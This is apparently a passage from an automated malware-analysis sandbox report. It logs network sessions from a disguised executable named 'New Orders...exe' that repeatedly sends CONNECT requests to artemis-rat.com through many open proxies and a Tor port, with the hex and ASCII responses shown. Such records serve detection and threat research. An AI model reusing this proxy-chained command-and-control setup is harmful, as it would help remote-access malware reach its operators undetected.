                                                                                        Mar 11, 2024 16:16:44.783721924 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:44 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1231192.168.2.953550192.252.216.8141457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.630377054 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1232192.168.2.953695104.24.15.158807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.630533934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.786226034 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:44 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1233192.168.2.953516183.230.162.12290917672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.630901098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.007147074 CET325INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx/1.12.1
                                                                                        Date: Mon, 11 Mar 2024 15:16:45 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 173
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.1</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1234192.168.2.95367335.190.107.16300007672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.631249905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1235192.168.2.953506106.105.218.244807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.644566059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1236192.168.2.95350890.188.250.16807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.651702881 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.079777002 CET340INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx/1.12.2
                                                                                        Date: Mon, 11 Mar 2024 15:16:44 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Content-Length: 173
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1237192.168.2.95363967.43.227.22790537672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.659195900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1238192.168.2.951333162.214.225.223340717672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.659528971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.667959929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:50.773749113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:56.773350954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:08.877511024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1239192.168.2.953490123.241.210.123807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.677160978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.185959101 CET326INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx
                                                                                        Date: Mon, 11 Mar 2024 15:16:44 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Content-Length: 166
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1240192.168.2.95367672.10.160.90100557672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.681948900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:51.956068039 CET19INHTTP/1.0 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1241192.168.2.95367872.10.160.9036017672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.682774067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:56.468810081 CET19INHTTP/1.0 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1242192.168.2.95369067.43.236.22130877672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.689424038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1243192.168.2.95355613.37.89.20131287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.690028906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.985805035 CET116INHTTP/1.1 200 OK
                                                                                        Date: Mon, 11 Mar 2024 15:16:44 GMT
                                                                                        Server: nginx
                                                                                        Content-Type: text/plain
                                                                                        Content-Length: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1244192.168.2.95369368.183.143.134807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.691273928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.323957920 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.106643915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.616729021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:50.391191006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:53.190670967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:55.933494091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:01.445523024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:12.242116928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1245192.168.2.953531116.199.168.141457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.774662971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1246192.168.2.953617158.255.215.50118577672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.775316954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.074441910 CET339INHTTP/1.1 403 Forbidden
                                                                                        Server: squid/4.7
                                                                                        Mime-Version: 1.0
                                                                                        Date: Mon, 11 Mar 2024 15:16:44 GMT
                                                                                        Content-Type: text/html;charset=utf-8
                                                                                        Content-Length: 5
                                                                                        X-Squid-Error: TCP_RESET 0
                                                                                        Vary: Accept-Language
                                                                                        Content-Language: en
                                                                                        X-Cache: MISS from proxy.wakoopa.com
                                                                                        Via: 1.1 proxy.wakoopa.com (squid/4.7)
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 72 65 73 65 74
                                                                                        Data Ascii: reset


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1247192.168.2.9536048.217.143.187156737672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.775448084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1248192.168.2.953533202.139.198.1530507672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.775584936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:18:03.106650114 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                                                                                        Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1249192.168.2.95298545.11.95.16552137672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.775840998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1250192.168.2.953731172.64.207.185807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.776918888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.938688993 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:44 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1251192.168.2.953570157.185.173.217265897672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.777184010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1252192.168.2.953645213.19.205.18543217672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
